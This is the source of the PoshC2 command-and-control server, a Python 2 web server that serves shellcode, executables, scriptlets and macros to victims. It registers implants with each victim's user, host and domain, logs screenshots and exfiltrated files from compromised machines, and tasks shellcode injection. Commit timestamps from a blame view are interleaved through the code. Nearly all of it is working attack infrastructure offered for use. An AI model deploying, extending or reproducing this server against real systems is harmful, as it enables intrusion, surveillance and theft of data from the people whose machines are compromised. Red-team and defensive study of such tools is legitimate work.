2018-07-23 08:55:15 +00:00
#!/usr/bin/env python
import argparse , os , sys , re , datetime , time , base64 , BaseHTTPServer , re , logging , ssl , signal
2018-12-12 16:28:18 +00:00
from Implant import *
2018-07-23 08:55:15 +00:00
from Tasks import *
from Core import *
from Colours import *
2018-12-12 16:28:18 +00:00
from Help import *
2018-07-23 08:55:15 +00:00
from DB import *
from Payloads import *
from Config import *
2018-12-12 16:28:18 +00:00
from Cert import *
2018-10-27 18:50:47 +00:00
from Help import *
2018-07-23 08:55:15 +00:00
class MyHandler ( BaseHTTPServer . BaseHTTPRequestHandler ) :
def signal_handler ( signal , frame ) :
sys . exit ( 0 )
signal . signal ( signal . SIGINT , signal_handler )
def log_message ( self , format , * args ) :
try :
useragent = str ( self . headers [ ' user-agent ' ] )
except Exception as e :
useragent = " None "
open ( " %s webserver.log " % ROOTDIR , " a " ) . write ( " %s - [ %s ] %s %s \n " %
( self . address_string ( ) , self . log_date_time_string ( ) , format % args , useragent ) )
def do_HEAD ( s ) :
""" Respond to a HEAD request. """
s . server_version = ServerHeader
s . sys_version = " "
s . send_response ( 200 )
s . send_header ( " Content-type " , " text/html " )
s . end_headers ( )
def do_GET ( s ) :
""" Respond to a GET request. """
logging . info ( " GET request, \n Path: %s \n Headers: \n %s \n " , str ( s . path ) , str ( s . headers ) )
new_implant_url = get_newimplanturl ( )
s . cookieHeader = s . headers . get ( ' Cookie ' )
QuickCommandURI = select_item ( " QuickCommand " , " C2Server " )
s . server_version = ServerHeader
s . sys_version = " "
if s . cookieHeader :
r = " "
else :
s . cookieHeader = " NONE "
# class Tasks()
# implant gets a new task
new_task = newTask ( s . path )
if new_task :
s . send_response ( 200 )
s . send_header ( " Content-type " , " text/html " )
s . end_headers ( )
s . wfile . write ( new_task )
elif ( " %s _bs " % QuickCommandURI ) in s . path :
filename = " %s payload.bat " % ( PayloadsDirectory )
with open ( filename , ' rb ' ) as f :
content = f . read ( )
s . send_response ( 200 )
s . send_header ( " Content-type " , " text/html " )
s . end_headers ( )
s . wfile . write ( content )
elif ( " %s _rg " % QuickCommandURI ) in s . path :
filename = " %s rg_sct.xml " % ( PayloadsDirectory )
with open ( filename , ' rb ' ) as f :
content = f . read ( )
s . send_response ( 200 )
s . send_header ( " Content-type " , " text/html " )
s . end_headers ( )
s . wfile . write ( content )
2019-01-01 20:56:13 +00:00
elif ( " %s potal " % QuickCommandURI ) in s . path :
filename = " %s Sharp-shellcode_x86.bin " % ( PayloadsDirectory )
with open ( filename , ' rb ' ) as f :
content = f . read ( )
content = base64 . b64encode ( content )
s . send_response ( 200 )
s . send_header ( " Content-type " , " text/html " )
s . end_headers ( )
s . wfile . write ( content )
elif ( " %s login " % QuickCommandURI ) in s . path :
filename = " %s Sharp-shellcode_x64.bin " % ( PayloadsDirectory )
with open ( filename , ' rb ' ) as f :
content = f . read ( )
content = base64 . b64encode ( content )
s . send_response ( 200 )
s . send_header ( " Content-type " , " text/html " )
s . end_headers ( )
s . wfile . write ( content )
2018-07-23 08:55:15 +00:00
elif ( " %s _cs " % QuickCommandURI ) in s . path :
filename = " %s cs_sct.xml " % ( PayloadsDirectory )
with open ( filename , ' rb ' ) as f :
content = f . read ( )
s . send_response ( 200 )
s . send_header ( " Content-type " , " text/html " )
s . end_headers ( )
s . wfile . write ( content )
2018-08-03 21:14:33 +00:00
elif ( " %s _py " % QuickCommandURI ) in s . path :
filename = " %s aes.py " % ( PayloadsDirectory )
with open ( filename , ' rb ' ) as f :
content = f . read ( )
2018-08-15 12:33:30 +00:00
content = " a " + " " . join ( " {:02x} " . format ( ord ( c ) ) for c in content )
2018-08-03 21:14:33 +00:00
s . send_response ( 200 )
s . send_header ( " Content-type " , " text/plain " )
s . end_headers ( )
s . wfile . write ( content )
2018-07-23 08:55:15 +00:00
elif ( " %s _ex " % QuickCommandURI ) in s . path :
filename = " %s Posh32.exe " % ( PayloadsDirectory )
with open ( filename , ' rb ' ) as f :
content = f . read ( )
s . send_response ( 200 )
s . send_header ( " Content-type " , " application/x-msdownload " )
s . end_headers ( )
s . wfile . write ( content )
2018-08-09 14:09:07 +00:00
elif ( " %s _ex6 " % QuickCommandURI ) in s . path :
filename = " %s Posh64.exe " % ( PayloadsDirectory )
with open ( filename , ' rb ' ) as f :
content = f . read ( )
s . send_response ( 200 )
s . send_header ( " Content-type " , " application/x-msdownload " )
s . end_headers ( )
s . wfile . write ( content )
2018-07-23 08:55:15 +00:00
# class Implant()
# register new implant
elif new_implant_url in s . path and s . cookieHeader . startswith ( " SessionID " ) :
implant_type = " Normal "
if s . path == ( " %s ?p " % new_implant_url ) :
implant_type = " Proxy "
if s . path == ( " %s ?d " % new_implant_url ) :
implant_type = " Daisy "
if s . path == ( " %s ?m " % new_implant_url ) :
implant_type = " OSX "
2018-12-27 12:10:46 +00:00
if s . path == ( " %s ?c " % new_implant_url ) :
implant_type = " C# "
2019-01-02 20:41:10 +00:00
if s . path == ( " %s ?p?c " % new_implant_url ) :
implant_type = " C# "
2018-12-27 12:10:46 +00:00
if implant_type == " C# " :
cookieVal = ( s . cookieHeader ) . replace ( " SessionID= " , " " )
decCookie = decrypt ( KEY , cookieVal )
IPAddress = " %s : %s " % ( s . client_address [ 0 ] , s . client_address [ 1 ] )
Domain , User , Hostname , Arch , PID , Proxy = decCookie . split ( " ; " )
2019-02-06 22:29:11 +00:00
user = User . decode ( " utf-8 " )
if " \\ " in user :
user = user [ user . index ( " \\ " ) + 1 : ]
newImplant = Implant ( IPAddress , implant_type , Domain . decode ( " utf-8 " ) , user , Hostname . decode ( " utf-8 " ) , Arch , PID , Proxy )
2018-12-27 12:10:46 +00:00
newImplant . save ( )
newImplant . display ( )
responseVal = encrypt ( KEY , newImplant . SharpCore )
s . send_response ( 200 )
s . send_header ( " Content-type " , " text/html " )
s . end_headers ( )
s . wfile . write ( responseVal )
2018-12-16 19:23:08 +00:00
2018-12-27 12:10:46 +00:00
elif implant_type == " OSX " :
2018-07-23 08:55:15 +00:00
cookieVal = ( s . cookieHeader ) . replace ( " SessionID= " , " " )
2018-08-03 21:14:33 +00:00
decCookie = decrypt ( KEY , cookieVal )
2018-07-23 08:55:15 +00:00
IPAddress = " %s : %s " % ( s . client_address [ 0 ] , s . client_address [ 1 ] )
2018-10-18 19:06:48 +00:00
User , Domain , Hostname , Arch , PID , Proxy = decCookie . split ( " ; " )
2018-12-12 16:28:18 +00:00
newImplant = Implant ( IPAddress , implant_type , Domain . decode ( " utf-8 " ) , User . decode ( " utf-8 " ) , Hostname . decode ( " utf-8 " ) , Arch , PID , Proxy )
2018-07-23 08:55:15 +00:00
newImplant . save ( )
newImplant . display ( )
responseVal = encrypt ( KEY , newImplant . PythonCore )
s . send_response ( 200 )
s . send_header ( " Content-type " , " text/html " )
s . end_headers ( )
s . wfile . write ( responseVal )
2018-12-12 16:28:18 +00:00
else :
try :
2018-07-23 08:55:15 +00:00
cookieVal = ( s . cookieHeader ) . replace ( " SessionID= " , " " )
decCookie = decrypt ( KEY , cookieVal )
Domain , User , Hostname , Arch , PID , Proxy = decCookie . split ( " ; " )
IPAddress = " %s : %s " % ( s . client_address [ 0 ] , s . client_address [ 1 ] )
2019-02-06 22:29:11 +00:00
user = User . decode ( " utf-8 " )
if " \\ " in user :
user = user [ user . index ( ' \\ ' ) + 1 : ]
newImplant = Implant ( IPAddress , implant_type , Domain . decode ( " utf-8 " ) , user , Hostname . decode ( " utf-8 " ) , Arch , PID , Proxy )
2018-07-23 08:55:15 +00:00
newImplant . save ( )
newImplant . display ( )
newImplant . autoruns ( )
responseVal = encrypt ( KEY , newImplant . C2Core )
s . send_response ( 200 )
s . send_header ( " Content-type " , " text/html " )
2018-12-12 16:28:18 +00:00
s . end_headers ( )
2018-07-23 08:55:15 +00:00
s . wfile . write ( responseVal )
except Exception as e :
2018-10-27 18:50:47 +00:00
print ( " Decryption error: %s " % e )
2018-07-23 08:55:15 +00:00
s . send_response ( 404 )
s . send_header ( " Content-type " , " text/html " )
2018-12-12 16:28:18 +00:00
s . end_headers ( )
2018-07-23 08:55:15 +00:00
s . wfile . write ( HTTPResponse )
2018-12-12 16:28:18 +00:00
else :
2018-07-23 08:55:15 +00:00
s . send_response ( 404 )
s . send_header ( " Content-type " , " text/html " )
s . end_headers ( )
HTTPResponsePage = select_item ( " HTTPResponse " , " C2Server " )
if HTTPResponsePage :
s . wfile . write ( HTTPResponsePage )
else :
s . wfile . write ( HTTPResponse )
def do_POST ( s ) :
""" Respond to a POST request. """
try :
s . server_version = ServerHeader
s . sys_version = " "
content_length = int ( s . headers [ ' Content-Length ' ] )
s . cookieHeader = s . headers . get ( ' Cookie ' )
cookieVal = ( s . cookieHeader ) . replace ( " SessionID= " , " " )
post_data = s . rfile . read ( content_length )
logging . info ( " POST request, \n Path: %s \n Headers: \n %s \n \n Body: \n %s \n " , str ( s . path ) , str ( s . headers ) , post_data )
now = datetime . datetime . now ( )
result = get_implants_all ( )
for i in result :
implantID = i [ 0 ]
RandomURI = i [ 1 ]
Hostname = i [ 3 ]
encKey = i [ 5 ]
Domain = i [ 11 ]
2019-02-06 22:29:11 +00:00
User = i [ 2 ]
2018-07-23 08:55:15 +00:00
if RandomURI in s . path and cookieVal :
2019-02-10 19:13:50 +00:00
update_implant_lastseen ( now . strftime ( " % m/ %d / % Y % H: % M: % S " ) , RandomURI )
2018-07-23 08:55:15 +00:00
decCookie = decrypt ( encKey , cookieVal )
2019-02-06 16:11:18 +00:00
if decCookie . startswith ( " Error " ) :
print ( Colours . RED )
print ( " The multicmd errored: " )
print ( decrypt_bytes_gzip ( encKey , post_data [ 1500 : ] ) )
print ( Colours . GREEN )
s . send_response ( 200 )
s . send_header ( " Content-type " , " text/html " )
s . end_headers ( )
s . wfile . write ( default_response ( ) )
return
taskId = str ( int ( decCookie . strip ( ' \x00 ' ) ) )
2019-02-11 22:06:33 +00:00
taskIdStr = " 0 " * ( 5 - len ( str ( taskId ) ) ) + str ( taskId )
2019-02-06 16:11:18 +00:00
executedCmd = get_cmd_from_task_id ( taskId )
2019-02-13 13:12:27 +00:00
task_owner = get_task_owner ( taskId )
2018-10-27 18:50:47 +00:00
print ( Colours . GREEN )
2019-02-13 13:12:27 +00:00
if task_owner is not None :
print ( " Task %s ( %s ) returned against implant %s on host %s \\ %s @ %s ( %s ) " % ( taskIdStr , task_owner , implantID , Domain , User , Hostname , now . strftime ( " % m/ %d / % Y % H: % M: % S " ) ) )
else :
print ( " Task %s returned against implant %s on host %s \\ %s @ %s ( %s ) " % ( taskIdStr , implantID , Domain , User , Hostname , now . strftime ( " % m/ %d / % Y % H: % M: % S " ) ) )
2018-07-23 08:55:15 +00:00
#print decCookie,Colours.END
2018-12-12 16:28:18 +00:00
rawoutput = decrypt_bytes_gzip ( encKey , post_data [ 1500 : ] )
2018-07-23 08:55:15 +00:00
outputParsed = re . sub ( r ' 123456(.+?)654321 ' , ' ' , rawoutput )
outputParsed = outputParsed . rstrip ( )
2019-02-06 16:11:18 +00:00
if " loadmodule " in executedCmd :
2018-10-27 18:50:47 +00:00
print ( " Module loaded sucessfully " )
2019-02-06 16:11:18 +00:00
update_task ( taskId , " Module loaded sucessfully " )
2019-02-13 12:56:45 +00:00
elif " get-screenshot " in executedCmd . lower ( ) or " screencapture " in executedCmd . lower ( ) :
2018-07-23 08:55:15 +00:00
try :
2018-12-12 16:28:18 +00:00
decoded = base64 . b64decode ( outputParsed )
2018-07-23 08:55:15 +00:00
filename = i [ 3 ] + " - " + now . strftime ( " % m %d % Y % H % M % S_ " + randomuri ( ) )
output_file = open ( ' %s %s .png ' % ( DownloadsDirectory , filename ) , ' wb ' )
2018-10-27 18:50:47 +00:00
print ( " Screenshot captured: %s %s .png " % ( DownloadsDirectory , filename ) )
2019-02-06 16:11:18 +00:00
update_task ( taskId , " Screenshot captured: %s %s .png " % ( DownloadsDirectory , filename ) )
2018-07-23 08:55:15 +00:00
output_file . write ( decoded )
output_file . close ( )
except Exception as e :
2019-02-06 16:11:18 +00:00
update_task ( taskId , " Screenshot not captured, the screen could be locked or this user does not have access to the screen! " )
2018-10-27 18:50:47 +00:00
print ( " Screenshot not captured, the screen could be locked or this user does not have access to the screen! " )
2019-02-06 16:11:18 +00:00
# What should this be now?
elif ( executedCmd . lower ( ) . startswith ( " $shellcode64 " ) ) or ( executedCmd . lower ( ) . startswith ( " $shellcode64 " ) ) :
update_task ( taskId , " Upload shellcode complete " )
2018-10-27 18:50:47 +00:00
print ( " Upload shellcode complete " )
2019-02-06 16:11:18 +00:00
elif ( executedCmd . lower ( ) . startswith ( " run-exe core.program core inject-shellcode " ) ) :
update_task ( taskId , " Upload shellcode complete " )
2019-01-02 20:47:27 +00:00
print ( outputParsed )
2019-02-06 16:11:18 +00:00
elif " download-file " in executedCmd . lower ( ) :
2018-07-23 08:55:15 +00:00
try :
rawoutput = decrypt_bytes_gzip ( encKey , ( post_data [ 1500 : ] ) )
2019-02-06 16:11:18 +00:00
filename = executedCmd . lower ( ) . replace ( " download-file " , " " )
filename = filename . replace ( " -source " , " " )
2018-07-23 08:55:15 +00:00
filename = filename . replace ( " .. " , " " )
2019-02-06 16:11:18 +00:00
filename = filename . replace ( " ' " , " " )
filename = filename . replace ( ' " ' , " " )
2018-09-03 16:51:21 +00:00
filename = filename . rsplit ( ' / ' , 1 ) [ - 1 ]
2018-07-23 08:55:15 +00:00
filename = filename . rsplit ( ' \\ ' , 1 ) [ - 1 ]
filename = filename . rstrip ( ' \x00 ' )
2019-02-06 16:11:18 +00:00
original_filename = filename
if rawoutput . startswith ( " Error " ) :
print ( " Error downloading file: " )
print rawoutput
else :
chunkNumber = rawoutput [ : 5 ]
totalChunks = rawoutput [ 5 : 10 ]
if ( chunkNumber == " 00001 " ) and os . path . isfile ( ' %s /downloads/ %s ' % ( ROOTDIR , filename ) ) :
counter = 1
while ( os . path . isfile ( ' %s /downloads/ %s ' % ( ROOTDIR , filename ) ) ) :
if ' . ' in filename :
filename = original_filename [ : original_filename . rfind ( ' . ' ) ] + ' - ' + str ( counter ) + original_filename [ original_filename . rfind ( ' . ' ) : ]
else :
filename = original_filename + ' - ' + str ( counter )
counter + = 1
if ( chunkNumber != " 00001 " ) :
counter = 1
if not os . path . isfile ( ' %s /downloads/ %s ' % ( ROOTDIR , filename ) ) :
print ( " Error trying to download part of a file to a file that does not exist: %s " % filename )
while ( os . path . isfile ( ' %s /downloads/ %s ' % ( ROOTDIR , filename ) ) ) :
# First find the 'next' file would be downloaded to
if ' . ' in filename :
filename = original_filename [ : original_filename . rfind ( ' . ' ) ] + ' - ' + str ( counter ) + original_filename [ original_filename . rfind ( ' . ' ) : ]
else :
filename = original_filename + ' - ' + str ( counter )
counter + = 1
if counter != 2 :
# Then actually set the filename to this file - 1 unless it's the first one and exists without a counter
if ' . ' in filename :
filename = original_filename [ : original_filename . rfind ( ' . ' ) ] + ' - ' + str ( counter ) + original_filename [ original_filename . rfind ( ' . ' ) : ]
else :
filename = original_filename + ' - ' + str ( counter )
else :
filename = original_filename
print ( " Download file part %s of %s to: %s " % ( chunkNumber , totalChunks , filename ) )
update_task ( taskId , " Download file part %s of %s to: %s " % ( chunkNumber , totalChunks , filename ) )
output_file = open ( ' %s /downloads/ %s ' % ( ROOTDIR , filename ) , ' a ' )
output_file . write ( rawoutput [ 10 : ] )
output_file . close ( )
2018-07-23 08:55:15 +00:00
except Exception as e :
2019-02-06 16:11:18 +00:00
update_task ( taskId , " Error downloading file %s " % e )
2018-10-27 18:50:47 +00:00
print ( " Error downloading file %s " % e )
2018-07-23 08:55:15 +00:00
else :
2019-02-06 16:11:18 +00:00
update_task ( taskId , outputParsed )
2018-10-27 18:50:47 +00:00
print ( Colours . GREEN )
print ( outputParsed + Colours . END )
2018-07-23 08:55:15 +00:00
except Exception as e :
e = " "
2019-02-06 16:11:18 +00:00
# print e
# traceback.print_exc()
2018-07-23 08:55:15 +00:00
finally :
s . send_response ( 200 )
s . send_header ( " Content-type " , " text/html " )
s . end_headers ( )
s . wfile . write ( default_response ( ) )
if __name__ == ' __main__ ' :
server_class = BaseHTTPServer . HTTPServer
httpd = server_class ( ( HOST_NAME , PORT_NUMBER ) , MyHandler )
try :
if os . name == ' nt ' :
os . system ( ' cls ' )
else :
os . system ( ' clear ' )
except Exception as e :
2018-10-27 18:50:47 +00:00
print ( " cls " )
print ( chr ( 27 ) + " [2J " )
print ( Colours . GREEN + logopic )
print ( Colours . END + " " )
2018-07-23 08:55:15 +00:00
# KeyFile = None, CertFile = None, ClientCertCAs = None
2019-02-11 21:00:56 +00:00
if os . path . isfile ( Database ) :
2018-10-27 18:50:47 +00:00
print ( " Using existing database / project " + Colours . GREEN )
2019-01-08 22:20:41 +00:00
C2 = get_c2server_all ( )
if ( C2 [ 1 ] == HostnameIP ) :
2019-01-29 19:36:01 +00:00
qstart = " %s quickstart.txt " % ( ROOTDIR )
if os . path . exists ( qstart ) :
with open ( qstart , ' rb ' ) as f :
print ( f . read ( ) )
2019-01-08 22:20:41 +00:00
else :
print ( " Error different IP so regenerating payloads " )
if os . path . exists ( " %s payloads_old " % ROOTDIR ) :
import shutil
shutil . rmtree ( " %s payloads_old " % ROOTDIR )
os . rename ( " %s payloads " % ROOTDIR , " %s payloads_old " % ROOTDIR )
os . makedirs ( " %s payloads " % ROOTDIR )
C2 = get_c2server_all ( )
newPayload = Payloads ( C2 [ 5 ] , C2 [ 2 ] , HostnameIP , C2 [ 3 ] , C2 [ 8 ] , C2 [ 12 ] ,
C2 [ 13 ] , C2 [ 11 ] , " " , " " , C2 [ 19 ] , C2 [ 20 ] , C2 [ 21 ] , get_newimplanturl ( ) , PayloadsDirectory )
new_urldetails ( " updated_host " , HostnameIP , C2 [ 3 ] , " " , " " , " " , " " )
update_item ( " HostnameIP " , " C2Server " , HostnameIP )
2019-01-29 20:02:53 +00:00
update_item ( " QuickCommand " , " C2Server " , QuickCommand )
2019-01-08 22:20:41 +00:00
newPayload . CreateRaw ( )
newPayload . CreateDlls ( )
newPayload . CreateShellcode ( )
newPayload . CreateSCT ( )
newPayload . CreateHTA ( )
newPayload . CreateCS ( )
newPayload . CreateMacro ( )
newPayload . CreateEXE ( )
newPayload . CreateMsbuild ( )
newPayload . CreatePython ( )
2019-01-29 20:02:53 +00:00
newPayload . WriteQuickstart ( ROOTDIR + ' quickstart.txt ' )
2019-01-08 22:20:41 +00:00
2018-07-23 08:55:15 +00:00
else :
2018-10-27 18:50:47 +00:00
print ( " Initializing new project folder and database " + Colours . GREEN )
print ( " " )
2018-07-23 08:55:15 +00:00
directory = os . path . dirname ( ROOTDIR )
if not os . path . exists ( directory ) :
os . makedirs ( directory )
os . makedirs ( " %s /downloads " % directory )
os . makedirs ( " %s /reports " % directory )
os . makedirs ( " %s /payloads " % directory )
initializedb ( )
2019-02-12 21:33:46 +00:00
if not validate_sleep_time ( DefaultSleep ) :
print ( Colours . RED )
print ( " Invalid DefaultSleep in config, please specify a time such as 50s, 10m or 1h " )
print ( Colours . GREEN )
sys . exit ( 1 )
2018-09-07 11:03:57 +00:00
setupserver ( HostnameIP , gen_key ( ) , DomainFrontHeader , DefaultSleep , KillDate , HTTPResponse , ROOTDIR , ServerPort , QuickCommand , DownloadURI , " " , " " , " " , Sounds , APIKEY , MobileNumber , URLS , SocksURLS , Insecure , UserAgent , Referer , APIToken , APIUser , EnableNotifications )
2019-01-03 22:27:39 +00:00
rewriteFile = " %s /rewrite-rules.txt " % directory
2018-12-14 01:39:24 +00:00
print " Creating Rewrite Rules in: " + rewriteFile
print " "
2019-01-16 21:30:00 +00:00
rewriteHeader = [ " RewriteEngine On " , " SSLProxyEngine On " , " SSLProxyCheckPeerCN Off " , " SSLProxyVerify none " , " SSLProxyCheckPeerName off " , " SSLProxyCheckPeerExpire off " , " # Change IPs to point at C2 infrastructure below " , " Define PoshC2 10.0.0.1 " , " Define SharpSocks 10.0.0.1 " ]
2018-12-14 01:39:24 +00:00
rewriteFileContents = rewriteHeader + urlConfig . fetchRewriteRules ( ) + urlConfig . fetchSocksRewriteRules ( )
with open ( rewriteFile , ' w ' ) as outFile :
for line in rewriteFileContents :
outFile . write ( line )
outFile . write ( ' \n ' )
outFile . close ( )
2018-07-23 08:55:15 +00:00
C2 = get_c2server_all ( )
2018-12-12 16:28:18 +00:00
newPayload = Payloads ( C2 [ 5 ] , C2 [ 2 ] , C2 [ 1 ] , C2 [ 3 ] , C2 [ 8 ] , C2 [ 12 ] ,
2018-07-23 08:55:15 +00:00
C2 [ 13 ] , C2 [ 11 ] , " " , " " , C2 [ 19 ] , C2 [ 20 ] ,
C2 [ 21 ] , get_newimplanturl ( ) , PayloadsDirectory )
2018-10-10 07:16:32 +00:00
new_urldetails ( " default " , C2 [ 1 ] , C2 [ 3 ] , " " , " " , " " , " " )
2018-07-23 08:55:15 +00:00
newPayload . CreateRaw ( )
newPayload . CreateDlls ( )
newPayload . CreateShellcode ( )
newPayload . CreateSCT ( )
newPayload . CreateHTA ( )
newPayload . CreateCS ( )
newPayload . CreateMacro ( )
newPayload . CreateEXE ( )
2018-09-16 15:53:44 +00:00
newPayload . CreateMsbuild ( )
2018-07-23 08:55:15 +00:00
create_self_signed_cert ( ROOTDIR )
newPayload . CreatePython ( )
newPayload . WriteQuickstart ( directory + ' /quickstart.txt ' )
2018-10-27 18:50:47 +00:00
print ( " " )
print ( " CONNECT URL: " + select_item ( " HostnameIP " , " C2Server " ) + get_newimplanturl ( ) + Colours . GREEN )
print ( " WEBSERVER Log: %s webserver.log " % ROOTDIR )
2018-07-23 08:55:15 +00:00
KEY = get_baseenckey ( )
2018-10-27 18:50:47 +00:00
print ( " " )
print ( time . asctime ( ) + " PoshC2 Server Started - %s : %s " % ( HOST_NAME , PORT_NUMBER ) )
print ( Colours . END )
2018-07-23 08:55:15 +00:00
if ( os . path . isfile ( " %s posh.crt " % ROOTDIR ) ) and ( os . path . isfile ( " %s posh.key " % ROOTDIR ) ) :
2019-01-01 14:48:07 +00:00
try :
2019-01-09 22:27:44 +00:00
httpd . socket = ssl . wrap_socket ( httpd . socket , keyfile = " %s posh.key " % ROOTDIR , certfile = " %s posh.crt " % ROOTDIR , server_side = True , ssl_version = ssl . PROTOCOL_TLS )
2019-01-01 14:48:07 +00:00
except Exception as e :
2019-01-09 22:27:44 +00:00
httpd . socket = ssl . wrap_socket ( httpd . socket , keyfile = " %s posh.key " % ROOTDIR , certfile = " %s posh.crt " % ROOTDIR , server_side = True , ssl_version = ssl . PROTOCOL_TLSv1 )
2018-07-23 08:55:15 +00:00
else :
raise ValueError ( " Cannot find the certificate files " )
#logging.basicConfig(level=logging.WARNING) # DEBUG,INFO,WARNING,ERROR,CRITICAL
try :
httpd . serve_forever ( )
except KeyboardInterrupt :
pass
httpd . server_close ( )
2018-10-27 18:50:47 +00:00
print ( time . asctime ( ) + " PoshC2 Server Stopped - %s : %s " % ( HOST_NAME , PORT_NUMBER ) )
